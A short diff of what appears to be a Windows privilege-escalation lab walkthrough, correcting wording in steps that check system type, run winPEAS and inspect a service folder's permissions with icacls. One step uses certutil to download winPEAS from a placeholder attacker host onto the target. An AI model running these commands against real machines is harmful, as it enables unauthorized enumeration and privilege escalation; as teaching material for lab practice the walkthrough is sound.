Skip to content

 systeminfo | findstr /B /C:"System Type"

-2. Transfer winPEAS to target machine Using certutil
+2. Transfer winPEAS to the target machine:

-certutil -urlcache -f http://[IP-ADRESS]:8000/winPEASx64.exe winPEASx64.exe
+certutil -urlcache -f http://[IP-ADDRESS]:8000/winPEASx64.exe winPEASx64.exe

 .\winPEASx64.exe

-NOTE: The Services Information section in winPEAS provides a comprehensive list of all services, along with their configurations and potential security issues.
+Note: The “Services Information” section in winPEAS lists all services, their configurations, and potential security issues.

 icacls "C:\Program Files\File Permissions Service"